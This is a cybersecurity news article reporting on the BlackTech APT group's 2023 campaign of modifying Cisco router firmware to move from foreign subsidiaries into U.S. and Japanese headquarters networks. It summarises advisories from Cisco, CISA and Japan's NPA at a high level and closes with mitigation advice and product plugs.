September's Cisco Attack Draws New Attention To 'BlackTech' APT
The Threat Actor Was First Detected in 2010
Overt Operator
October 02, 2023
Photo by Sora Shimazaki on Pexels
The infamous APT group "BlackTech" was tracked targeting Cisco firmware in the U.S. and Japan, security researchers discovered in September. The discovery drew renewed attention to the long-standing threat actor.
Cisco last updated the status of the BlackTech attacks on September 27. The attack on Cisco, where BlackTech hit in Cisco’s firmware, is one of the most notable actions of the group, which uses firmware modification as one of its most “noteworthy” tactics.
“The most prevalent initial access vector in these attacks involves stolen or weak administrative credentials. As outlined in the report, certain configuration changes, such as disabling logging and downloading firmware, require administrative credentials,” Cisco wrote in its status update.
“There is no indication that any Cisco vulnerabilities were exploited. Attackers used compromised credentials to perform administrative-level configuration and software changes,” Cisco stated in its last update on the situation. Read the full report at Cisco Security.
First detected in 2010, the malicious activities of the BlackTech APT group have spanned a wide range of sectors, including governmental institutions, industrial facilities, technological infrastructure, media outlets, electronic systems, mobile devices, and military establishments.
To remain undetected, BlackTech uses custom-made malware, tools that have both good and bad uses, and a variety of clever methods that take advantage of existing system resources, such as disabling data recording features on routers.
The Japan National Police Agency (NPA) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have found evidence that BlackTech can change router firmware and use the domain-trust relationships of routers to move from international subsidiaries to headquarters in Japan and the U.S. Cyber criminals in the black market are constantly updating their tools to evade detection. They also steal code-signing certificates to make their malware look legitimate.
BlackTech actors use custom-made malware payloads and remote access tools (RATs) to gain access to their victims’ computers. These tools are compatible with a variety of operating systems, such as Windows®, Linux®, and FreeBSD®.
The group also takes advantage of living-off-the-land techniques to blend in with normal network activities and operating systems, making it more difficult for endpoint detection and response (EDR) tools to identify them.
Currently, BlackTech’s campaign is targeting foreign branches of American and Japanese companies. Once the group gains access to these networks, they can move up to headquarters networks. CISA and NPA explained as follows: “BlackTech actors take advantage of trusted network relationships between a known victim and other entities to gain more access to target networks.”
BlackTech’s toolkit includes a variety of router names and versions from different firms. In the case of Cisco routers, the attackers hide in Embedded Event Manager (EEM) rules, which are used in Cisco IOS to set up automatic tasks.
To mitigate BlackTech’s malicious activities, CISA and NPA suggest that network defenses should be on the lookout for strange traffic, reboots, and illegal downloads of bootloaders, firmware images, and images. It is also important to take advantage of patch management solutions, such as Patch Manager Plus, which can quickly patch over 850 third-party applications.
Security analysts advise that emails should be secured with AI-powered email security solutions such asTrustifi to protect against email tracking, blocking, modifying, phishing, account take over, business email compromise, malware, and ransomware.